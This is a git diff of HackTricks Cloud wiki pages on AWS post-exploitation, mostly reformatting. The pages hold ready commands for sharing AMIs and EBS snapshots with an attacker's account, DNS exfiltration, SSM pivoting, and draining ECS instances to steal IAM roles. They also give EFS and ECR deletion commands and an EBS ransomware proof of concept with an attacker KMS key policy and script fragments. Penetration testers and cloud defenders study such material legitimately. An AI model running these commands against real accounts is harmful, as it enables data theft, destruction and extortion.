- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## EC2 & VPC For more information check: -{% content-ref url="../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} +{{#ref}} +../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} ### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule` @@ -30,9 +17,9 @@ An attacker could abuse this to capture all the traffic and obtain sensitive inf For more information check this page: -{% content-ref url="aws-malicious-vpc-mirror.md" %} -[aws-malicious-vpc-mirror.md](aws-malicious-vpc-mirror.md) -{% endcontent-ref %} +{{#ref}} +aws-malicious-vpc-mirror.md +{{#endref}} ### Copy Running Instance @@ -43,22 +30,22 @@ Instances usually contain some kind of sensitive information. There are differen aws ec2 describe-images # create a new image for the instance-id -aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 +aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 # add key to AWS -aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 +aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 # create ec2 using the previously created AMI, use the same security group and subnet to connect easily. aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 -# now you can check the instance -aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 # If needed : edit groups aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 # be a good guy, clean our instance to avoid any useless cost -aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 ``` @@ -67,9 +54,9 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west **Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\ If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account: -{% content-ref url="aws-ebs-snapshot-dump.md" %} -[aws-ebs-snapshot-dump.md](aws-ebs-snapshot-dump.md) -{% endcontent-ref %} +{{#ref}} +aws-ebs-snapshot-dump.md +{{#endref}} ### Data Exfiltration @@ -77,11 +64,11 @@ If you find a **volume without a snapshot** you could: **Create a snapshot** and Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**. -* **VPC Flow Logs will not record this**. -* You have no access to AWS DNS logs. -* Disable this by setting "enableDnsSupport" to false with: +- **VPC Flow Logs will not record this**. +- You have no access to AWS DNS logs. +- Disable this by setting "enableDnsSupport" to false with: - `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` + `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` #### Exfiltration via API calls @@ -91,12 +78,10 @@ An attacker could call API endpoints of an account controlled by him. Cloudtrail You could get further access to network services by opening ports like this: -{% code overflow="wrap" %} ```bash aws ec2 authorize-security-group-ingress --group-id --protocol tcp --port 80 --cidr 0.0.0.0/0 # Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC ``` -{% endcode %} ### Privesc to ECS @@ -113,6 +98,7 @@ aws ec2 delete-flow-logs --flow-log-ids --region ### SSM Port Forwarding Required permissions: + - `ssm:StartSession` In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs. @@ -141,35 +127,32 @@ aws eks update-kubeconfig --profile bastion-ec2 --region -- ```shell sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":[""],"portNumber":["443"], "localPortNumber":["443"]}' --region ``` + 8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running: + ```shell -kubectl get pods --insecure-skip-tls-verify +kubectl get pods --insecure-skip-tls-verify ``` Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks. Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. - ### Share AMI -{% code overflow="wrap" %} ```bash aws ec2 modify-image-attribute --image-id --launch-permission "Add=[{UserId=}]" --region ``` -{% endcode %} ### Search sensitive information in public and private AMIs -* [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data. +- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data. ### Share EBS Snapshot -{% code overflow="wrap" %} ```bash aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-permission "Add=[{UserId=}]" --region ``` -{% endcode %} ### EBS Ransomware PoC @@ -271,11 +254,11 @@ First from an 'attacker' AWS account, create a customer managed key in KMS. For The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume: -* `kms:CreateGrant` -* `kms:Decrypt` -* `kms:DescribeKey` -* `kms:GenerateDataKeyWithoutPlainText` -* `kms:ReEncrypt` +- `kms:CreateGrant` +- `kms:Decrypt` +- `kms:DescribeKey` +- `kms:GenerateDataKeyWithoutPlainText` +- `kms:ReEncrypt` Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account. @@ -295,76 +278,72 @@ Next, return to the key policy in the 'attacker' account and remove the 'Outside ```json { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow access for Key Administrators", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Create*", - "kms:Describe*", - "kms:Enable*", - "kms:List*", - "kms:Put*", - "kms:Update*", - "kms:Revoke*", - "kms:Disable*", - "kms:Get*", - "kms:Delete*", - "kms:TagResource", - "kms:UntagResource", - "kms:ScheduleKeyDeletion", - "kms:CancelKeyDeletion" - ], - "Resource": "*" - }, - { - "Sid": "Allow use of the key", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*" - }, - { - "Sid": "Allow attachment of persistent resources", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:CreateGrant", - "kms:ListGrants", - "kms:RevokeGrant" - ], - "Resource": "*", - "Condition": { - "Bool": { - "kms:GrantIsForAWSResource": "true" - } - } + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:root" + }, + "Action": "kms:*", + "Resource": "*" + }, + { + "Sid": "Allow access for Key Administrators", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:Create*", + "kms:Describe*", + "kms:Enable*", + "kms:List*", + "kms:Put*", + "kms:Update*", + "kms:Revoke*", + "kms:Disable*", + "kms:Get*", + "kms:Delete*", + "kms:TagResource", + "kms:UntagResource", + "kms:ScheduleKeyDeletion", + "kms:CancelKeyDeletion" + ], + "Resource": "*" + }, + { + "Sid": "Allow use of the key", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:Encrypt", + "kms:Decrypt", + "kms:ReEncrypt*", + "kms:GenerateDataKey*", + "kms:DescribeKey" + ], + "Resource": "*" + }, + { + "Sid": "Allow attachment of persistent resources", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"], + "Resource": "*", + "Condition": { + "Bool": { + "kms:GrantIsForAWSResource": "true" } - ] + } + } + ] } ``` @@ -462,7 +441,7 @@ def replace_volumes(ec2_client, instance_volumes): def ebs_lock(access_key, secret_key, region, kms_key_arn): ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region) - + instance_volumes = enumerate_ec2_instances(ec2_client) all_volumes = [vol for vols in instance_volumes.values() for vol in vols] snapshot_ids = snapshot_volumes(ec2_client, all_volumes) @@ -495,17 +474,4 @@ if __name__ == "__main__": main() ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md similarity index 60% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md index 4c0fa0e1c..8f5ebb565 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md @@ -1,19 +1,6 @@ # AWS - EBS Snapshot Dump -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Checking a snapshot locally @@ -46,11 +33,9 @@ make docker/build IMAGE=".img" make docker/run #With the snapshot downloaded ``` -{% hint style="danger" %} -**Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that: -{% endhint %} +> [!CAUTION] +> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that: -{% code overflow="wrap" %} ```bash # Copy the snapshot aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57" @@ -64,19 +49,16 @@ dsnap --region us-east-2 get snap-027da41be451109da # Delete the snapshot after downloading aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2 ``` -{% endcode %} For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) -You can do this with Pacu using the module [ebs\_\_download\_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) +You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) ## Checking a snapshot in AWS -{% code overflow="wrap" %} ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 ``` -{% endcode %} **Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup): @@ -84,8 +66,8 @@ Step 1: A new volume of your preferred size and type is to be created by heading To be able to perform this action, follow these commands: -* Create an EBS volume to attach to the EC2 instance. -* Ensure that the EBS volume and the instance are in the same zone. +- Create an EBS volume to attach to the EC2 instance. +- Ensure that the EBS volume and the instance are in the same zone. Step 2: The "attach volume" option is to be selected by right-clicking on the created volume. @@ -93,7 +75,7 @@ Step 3: The instance from the instance text box is to be selected. To be able to perform this action, use the following command: -* Attach the EBS volume. +- Attach the EBS volume. Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`. @@ -113,14 +95,13 @@ Step 9: Change directory to the "newvolume" directory and check the disk space t To be able to perform this action, use the following commands: -* Change directory to `/newvolume`. -* Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. +- Change directory to `/newvolume`. +- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. You can do this with Pacu using the module `ebs__explore_snapshots`. ## Checking a snapshot in AWS (using cli) -{% code overflow="wrap" %} ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id @@ -146,7 +127,6 @@ sudo mount /dev/xvdh1 /mnt ls /mnt ``` -{% endcode %} ## Shadow Copy @@ -156,19 +136,6 @@ You can use this tool to automate the attack: [https://github.com/Static-Flow/Cl ## References -* [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/) +- [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md new file mode 100644 index 000000000..69042df5f --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md @@ -0,0 +1,15 @@ +# AWS - Malicious VPC Mirror + +{{#include ../../../../banners/hacktricks-training.md}} + +**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** + +Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. + +To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. + +The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. + +For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md similarity index 55% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md index 3d8bb5192..aea1b48dd 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md @@ -1,31 +1,17 @@ # AWS - ECR Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## ECR For more information check -{% content-ref url="../aws-services/aws-ecr-enum.md" %} -[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ecr-enum.md +{{#endref}} ### Login, Pull & Push -{% code overflow="wrap" %} ```bash # Docker login into ecr ## For public repo (always use us-east-1) @@ -38,7 +24,7 @@ aws ecr get-login-password --profile --region | docker l docker pull .dkr.ecr..amazonaws.com/:latest ## If you still have the error "Requested image not found" ## It might be because the tag "latest" doesn't exit -## Get valid tags with: +## Get valid tags with: TOKEN=$(aws --profile ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken') curl -i -H "Authorization: Basic $TOKEN" https://.dkr.ecr..amazonaws.com/v2//tags/list @@ -61,11 +47,12 @@ aws ecr get-download-url-for-layer \ --registry-id 653711331788 \ --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" ``` -{% endcode %} After downloading the images you should **check them for sensitive info**: -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics" %} +{{#ref}} +https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics +{{#endref}} ### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage` @@ -106,17 +93,4 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0 ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md new file mode 100644 index 000000000..115f36302 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md @@ -0,0 +1,63 @@ +# AWS - ECS Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## ECS + +For more information check: + +{{#ref}} +../aws-services/aws-ecs-enum.md +{{#endref}} + +### Host IAM Roles + +In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\ +Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check: + +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} + +> [!CAUTION] +> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance. + +### Privesc to node to steal other containers creds & secrets + +But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached. + +#### Making containers run in current host + +Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container. + +```bash +aws ecs update-container-instances-state \ + --cluster --status DRAINING --container-instances +``` + +The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:** + +```bash +aws ecs deregister-container-instance \ + --cluster --container-instance --force +``` + +A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this: + +```bash +# Needs: ecs:SubmitTaskStateChange +aws ecs submit-task-state-change --cluster \ + --status STOPPED --reason "anything" --containers [...] + +# Needs: ecs:SubmitContainerStateChange +aws ecs submit-container-state-change ... + +# Needs: ecs:SubmitAttachmentStateChanges +aws ecs submit-attachment-state-changes ... +``` + +### Steal sensitive info from ECR containers + +The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them). + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md new file mode 100644 index 000000000..daf1fb898 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md @@ -0,0 +1,54 @@ +# AWS - EFS Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## EFS + +For more information check: + +{{#ref}} +../aws-services/aws-efs-enum.md +{{#endref}} + +### `elasticfilesystem:DeleteMountTarget` + +An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target. + +```sql +aws efs delete-mount-target --mount-target-id +``` + +**Potential Impact**: Disruption of file system access and potential data loss for users or applications. + +### `elasticfilesystem:DeleteFileSystem` + +An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system. + +```perl +aws efs delete-file-system --file-system-id +``` + +**Potential Impact**: Data loss and service disruption for applications using the deleted file system. + +### `elasticfilesystem:UpdateFileSystem` + +An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion. + +```sql +aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps +``` + +**Potential Impact**: Degradation of file system performance or resource exhaustion. + +### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint` + +An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system. + +```arduino +aws efs create-access-point --file-system-id --posix-user --root-directory +aws efs delete-access-point --access-point-id +``` + +**Potential Impact**: Unauthorized access to the file system, data exposure or modification. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md similarity index 50% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md index 3421ae7cc..90c8a2c96 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - EKS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## EKS For mor information check -{% content-ref url="../aws-services/aws-eks-enum.md" %} -[aws-eks-enum.md](../aws-services/aws-eks-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-eks-enum.md +{{#endref}} ### Enumerate the cluster from the AWS Console @@ -29,26 +16,24 @@ If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernet ### Connect to AWS Kubernetes Cluster -* Easy way: +- Easy way: ```bash # Generate kubeconfig aws eks update-kubeconfig --name aws-eks-dev ``` -* Not that easy way: +- Not that easy way: If you can **get a token** with **`aws eks get-token --name `** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**. In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name): -{% code overflow="wrap" %} ```bash API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com 